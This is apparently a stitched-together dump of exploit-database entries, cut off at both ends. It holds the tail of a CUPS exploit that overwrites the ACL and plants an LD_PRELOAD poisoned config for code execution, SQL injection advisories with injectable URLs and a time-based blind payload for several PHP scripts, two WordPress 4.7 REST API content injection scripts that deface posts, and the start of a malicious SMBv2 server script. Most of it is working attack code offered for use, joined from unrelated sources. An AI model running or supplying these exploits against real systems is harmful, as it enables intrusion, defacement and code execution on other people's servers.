"\x0d\x0a")
http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","stomping ACL")
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
time.sleep(1)
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))
http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","checking /admin")
pretty("*",">:\n" + createDump(http_header_check))
res = txrx(rhost,rport,"tcp",http_header_check)
pretty("*","<:\n" + createDump(res))
m = re.search('200 OK', res)
if m is not None:
pretty("+","ACL stomp successful")
else:
pretty("-","exploit failed")
exit(1)
def getConfig(rhost, rport):
i = random.randint(1,1024)
original_config = ""
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","grabbing configuration file....")
res = txrx(rhost,rport,"tcp",http_request)
res_array = res.split("\x0d\x0a\x0d\x0a")
original_config = res_array[1]
pretty("*","config:\n" + original_config + "\n")
return original_config
def putConfig(rhost, rport, config):
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"Content-Length: " + str(len(config)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","overwriting config...")
pretty("*",">:\n" + createDump(http_request + config))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
def poisonConfig(config, name):
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
return config
def main():
rhost = None;
rport = None;
noshell = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--lib'):
libpath = arg;
elif opt in ('-f','--stomp-only'):
noshell = 1;
banner()
if rhost is None or rport is None:
usage()
pretty("*","locate available printer")
printer = locatePrinters(rhost, rport)
pretty("*","stomp ACL")
stompACL(rhost, rport, printer)
if (noshell is not None):
pretty("*","fin")
exit(0)
pretty("*","prepare payload")
payload = preparePayload(libpath)
pretty("*","spray payload")
jobid = seedTarget(rhost, rport, printer, payload)
pretty("*","grab original config")
OG_config = getConfig(rhost, rport)
pretty("*","generate poison config")
evil_config = poisonConfig(OG_config, jobid)
pretty("*","upload poison config")
putConfig(rhost, rport, evil_config)
pretty("*","fin")
exit(0);
if __name__ == "__main__":
main()
# # # # #
# Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/travel-portal-script/
# Demo: http://travel.itechscripts.com/
# Version: 9.35
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/content.php?id=[SQL]
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/showCity.php?q=[SQL]
# E.t.c... E.t.c...
# # # # #
# # # # #
# Exploit Title: Itech Movie Portal Script v7.37 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/movie-portal-script/
# Demo: http://movie-portal.itechscripts.com
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/cms.php?id=[SQL]
# http://localhost/[PATH]/show_news.php?id=[SQL]
# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
# E.t.c... E.t.c...
# # # # #
# # # # #
# Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/auction-script/
# Demo: http://auction.itechscripts.com/
# Version: 6.49
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL]
# E.t.c.
# # # # #
# # # # #
# Exploit Title: Itech News Portal Script v6.28 - 'sc' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/news-portal-script/
# Demo: http://news-portal.itechscripts.com/
# Version: 6.28
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/subcategory.php?sc=[SQL]
# E.t.c.
# # # # #
# # # # #
# Exploit Title: Itech Inventory Management Software v3.77 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/inventory-management-software/
# Demo: http://inventory.itechscripts.com/
# Version: 3.77
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as employee user
# http://localhost/[PATH]/notice-edit.php?aid=[SQL]
# E.t.c...
# # # # #
Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.
Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind
Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)
data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not enabled. This might not work!')
return u
def get_posts(api_base):
respone = urllib2.urlopen(api_base + 'wp/v2/posts')
posts = json.loads(respone.read())
for post in posts:
print(' - Post ID: {0}, Title: {1}, Url: {2}'
.format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
# more than just the content field can be updated. see the api docs here:
# https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
data = json.dumps({
'content': post_content
})
url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
# ensure we have at least a url
if len(sys.argv) < 2:
print_usage()
sys.exit(1)
# if we have a post id, we need content too
if 2 < len(sys.argv) < 4:
print('Please provide a file with post content with a post id')
print_usage()
sys.exit(1)
print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {0}'.format(api_url))
# if we only have a url, show the posts we have have
if len(sys.argv) < 3:
print('* Getting available posts')
get_posts(api_url)
sys.exit(0)
# if we get here, we have what we need to update a post!
print('* Updating post {0}'.format(sys.argv[2]))
with open(sys.argv[3], 'r') as content:
new_content = content.readlines()
update_post(api_url, sys.argv[2], ''.join(new_content))
print('* Update complete!')
# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
puts "This site is not Vulnerable"
end
# Full Proof of Concept:
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41222.zip
import sys, struct, SocketServer
from odict import OrderedDict
from datetime import datetime
from calendar import timegm
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
def NTStamp(Time):
NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000)
return struct.pack("Q", NtStamp + (Time.microsecond * 10))
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
def GrabMessageID(data):
Messageid = data[28:36]
return Messageid
def GrabCreditRequested(data):
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
else:
CreditsRequested = data[18:20]
return CreditsRequested
def GrabCreditCharged(data):
CreditCharged = data[10:12]
return CreditCharged
def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
##################################################################################
class SMBv2Header(Packet):
fields = OrderedDict([
("Proto", "\xfe\x53\x4d\x42"),
("Len", "\x40\x00"),
("CreditCharge", "\x00\x00"),
("NTStatus", "\x00\x00\x00\x00"),
("Cmd", "\x00\x00"),
("Credits", "\x01\x00"),
("Flags", "\x01\x00\x00\x00"),
("NextCmd", "\x00\x00\x00\x00"),
("MessageId", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("PID", "\xff\xfe\x00\x00"),
("TID", "\x00\x00\x00\x00"),
("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
])
##################################################################################
class SMB2NegoAns(Packet):
fields = OrderedDict([
("Len", "\x41\x00"),
("Signing", "\x01\x00"),
("Dialect", "\xff\x02"),
("Reserved", "\x00\x00"),
("Guid", "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
("Capabilities", "\x07\x00\x00\x00"),
("MaxTransSize", "\x00\x00\x10\x00"),
("MaxReadSize", "\x00\x00\x10\x00"),
("MaxWriteSize", "\x00\x00\x10\x00"),
("SystemTime", NTStamp(datetime.now())),
("BootTime", "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
("SecBlobOffSet", "\x80\x00"),
("SecBlobLen", "\x78\x00"),
("Reserved2", "\x4d\x53\x53\x50"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x76"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x6c"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x6a"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x3c"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x3a"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x0a"),
("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
("NegThisMech3ASNId", "\x06"),
("NegThisMech3ASNLen", "\x09"),
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x0a"),
("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
("NegThisMech5ASNId", "\x06"),
("NegThisMech5ASNLen", "\x0a"),
("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x2a"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x28"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x26"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x24"),
("NegHintFinalASNStr", "Server2009@SMB3.local"),
("Data", ""),
])
def calculate(self):
StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
#Sec Blob lens
self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen))
#ASN Stuff
self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2)
self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
##################################################################################
class SMB2Session1Data(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x06\x01"),
("ChoiceTagASNId", "\xa1"),
("ChoiceTagASNLenOfLen", "\x82"),
("ChoiceTagASNIdLen", "\x01\x02"),
("NegTokenTagASNId", "\x30"),
("NegTokenTagASNLenOfLen","\x81"),
("NegTokenTagASNIdLen", "\xff"),
("Tag0ASNId", "\xA0"),
("Tag0ASNIdLen", "\x03"),
("NegoStateASNId", "\x0A"),
("NegoStateASNLen", "\x01"),
("NegoStateASNValue", "\x01"),
("Tag1ASNId", "\xA1"),
("Tag1ASNIdLen", "\x0c"),
("Tag1ASNId2", "\x06"),
("Tag1ASNId2Len", "\x0A"),
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("Tag2ASNId", "\xA2"),
("Tag2ASNIdLenOfLen", "\x81"),
("Tag2ASNIdLen", "\xE9"),
("Tag3ASNId", "\x04"),
("Tag3ASNIdLenOfLen", "\x81"),
("Tag3ASNIdLen", "\xE6"),
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen","\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen","\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x06"),
("NegTokenInitSeqMechMessageVersionLow","\x03"),
("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NTLMSSPNtWorkstationName","SMB3"),
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"),
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())),
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
])
def calculate(self):
###### Convert strings to Unicode
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
#Packet struct calc:
StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
